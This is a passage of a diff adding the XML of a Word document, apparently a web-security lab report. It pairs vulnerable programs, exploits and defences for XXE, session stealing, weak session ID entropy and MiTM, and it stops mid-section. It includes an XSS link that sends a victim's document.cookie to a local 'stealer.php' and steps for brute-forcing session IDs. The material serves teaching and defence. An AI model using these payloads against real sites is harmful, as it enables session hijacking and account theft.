+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20EA5F29" wp14:editId="5A5179F1">
+            <wp:extent cx="5133975" cy="247650"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="37" name="Image 37"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5133975" cy="247650"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">We have access to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>foo</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> table content.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04286892" wp14:editId="5B9F5E03">
+            <wp:extent cx="4748280" cy="1860698"/>
+            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
+            <wp:docPr id="4" name="Image 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4974867" cy="1949490"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>XML External Entity</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="3"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C3CC4E" wp14:editId="76CC6A61">
+            <wp:extent cx="4867275" cy="1895475"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="8" name="Image 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4867275" cy="1895475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CB6753C">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>25400</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>226222</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6343601" cy="3062177"/>
+            <wp:effectExtent l="0" t="0" r="635" b="5080"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="10" name="Image 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6343601" cy="3062177"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+            <wp14:sizeRelH relativeFrom="margin">
+              <wp14:pctWidth>0</wp14:pctWidth>
+            </wp14:sizeRelH>
+            <wp14:sizeRelV relativeFrom="margin">
+              <wp14:pctHeight>0</wp14:pctHeight>
+            </wp14:sizeRelV>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We can read C:\secret.txt file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="337ABFE6" wp14:editId="53459D19">
+            <wp:extent cx="3806456" cy="1393825"/>
+            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
+            <wp:docPr id="9" name="Image 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3838120" cy="1405420"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Session Management</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (part </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>one</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>, session stealing</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="4"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="298F5DDE" wp14:editId="74B06EF0">
+            <wp:extent cx="5731510" cy="1231900"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
+            <wp:docPr id="14" name="Image 14"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1231900"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Send</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> t</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">he following link to the victim : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>http://127.0.0.1/?name=&lt;script&gt;document.location=("http://127.0.0.1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>/stealer.php?cookies=".concat(document.cookie));&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Get the stolen session</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Change the session to the stolen one </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10355E65" wp14:editId="5B76EA4E">
+            <wp:extent cx="2552700" cy="209550"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="15" name="Image 15"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2552700" cy="209550"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C8E4054" wp14:editId="45242A7C">
+            <wp:extent cx="5731510" cy="1526540"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="16" name="Image 16"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1526540"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Session Management</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (part </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>two</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>, bad session ID entropy</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="5"/>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503601AB" wp14:editId="6472D0FF">
+            <wp:extent cx="4886325" cy="838200"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="22" name="Image 22"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4886325" cy="838200"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Generate a list of numbers from 1 to 999999</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Bruteforce the session with each number</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB7A21F" wp14:editId="111D30DC">
+            <wp:extent cx="2428875" cy="438150"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="24" name="Image 24"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2428875" cy="438150"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="720" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Change the session ID algorithm in order to have a proper session ID</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, use a good PRGA.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Session Management</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (part </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>three</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>MiTM</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="6"/>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C518E1B" wp14:editId="3FC586BD">
+            <wp:extent cx="5731510" cy="1231900"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
+            <wp:docPr id="78" name="Image 78"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="1231900"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F34D599">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>397510</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>249555</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5731510" cy="2942590"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="80" name="Image 80"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2942590"/>
+                    </a:xfrm>
